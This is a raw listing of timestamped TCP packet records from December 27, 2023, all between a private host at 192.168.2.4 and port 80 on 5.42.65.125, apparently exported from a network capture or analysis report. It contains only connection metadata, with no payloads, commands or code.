Dec 27, 2023 18:12:25.271359921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271750927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271821022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271857977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271864891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271904945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271939993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271946907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271960020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271965981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271984100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271984100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271991968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272000074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272003889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272027969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272052050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272058964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272066116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272073030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272090912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272131920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272139072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272150993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272157907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272177935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272754908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272762060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272768021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272774935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272780895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272789001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272797108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272826910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272830963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272838116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272845030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272877932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272895098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272922993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272929907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272941113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272945881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272958040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272964954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272969007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.272972107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272978067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272984982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.272996902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273010969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273751974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273758888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273770094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273777008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273783922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273797035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273798943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273821115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273827076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273827076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273834944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273847103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273855925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273857117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273863077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273875952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273900032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.273917913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273926020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.273962975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274461985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274468899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274499893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274513960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274521112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274549007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274616003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274621964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274633884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274641037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274646997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274658918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274658918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274666071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274673939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274681091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274683952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274713993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274719000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274722099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274734020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274739981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274746895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.274755955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274790049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.274800062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276494980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276530981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276542902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276568890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276577950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276586056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276598930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276604891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276623011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276624918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276645899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276679039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276686907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276699066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276730061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276746988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276753902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276766062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276773930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276792049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276808977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276829004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276837111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276848078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276864052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276871920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.276874065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276902914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.276968002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277004957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.277013063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277159929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277167082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277178049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277184010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277192116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277199030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277204990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.277204990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277213097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277220011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277228117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.277229071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.277257919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278186083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278250933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278263092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278270006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278286934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278304100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278311968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278327942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278343916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278347969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278356075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278367996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278367996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278398991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278419018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278425932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278438091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278445005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278451920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278465033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278486013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278517008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278523922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278529882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278537035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278558016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278573036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278881073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278888941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278899908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.278923035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.278930902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279097080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279104948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279117107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279124022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279134989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279140949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279140949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279148102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279155016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279162884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279165983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279169083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279176950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279182911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279189110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279191017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279196024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279198885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279206991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279215097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279239893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279676914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279705048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279716969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279740095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279755116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279804945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279812098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279829025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279835939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279841900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279858112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279870033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279876947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279881001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279884100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279896975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.279902935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.279927969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280347109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280354977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280361891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280368090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280388117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280412912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280421019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280443907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280451059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280453920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280458927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280489922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280494928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280498028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280517101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280564070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280567884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280575991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280587912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280594110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280612946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280627012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280647039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280654907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280666113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280673027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.280690908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.280718088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281308889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281316996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281357050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281435966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281444073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281456947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281462908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281471014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281483889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281486988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281505108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281512022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281518936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281529903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281537056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281549931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281557083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281563044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281565905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281569004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281574011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281575918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281588078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.281589031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281605959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281630993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.281645060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282356977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282365084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282397032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282403946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282408953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282429934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282442093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282470942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282501936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282509089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282521963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282529116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282536983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282543898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282550097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282556057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282583952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282835960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282843113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282892942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282911062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282918930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282932043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282959938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.282968998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282977104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.282985926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283013105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283036947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283045053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283081055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283090115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283097982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283123970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283196926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283204079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283210039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283216953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283224106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283236027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283236027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283260107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283271074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283272982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283297062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283315897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283756971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283818960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283827066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283833981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283840895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283848047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.283855915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.283885956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284046888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284054041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284065008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284070969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284077883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284089088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284094095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284096003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284102917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284109116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284115076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284122944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284126043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284130096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284136057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284142971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284153938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284183025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284744978 CET	80	49738	5.42.65.125	192.168.2.4
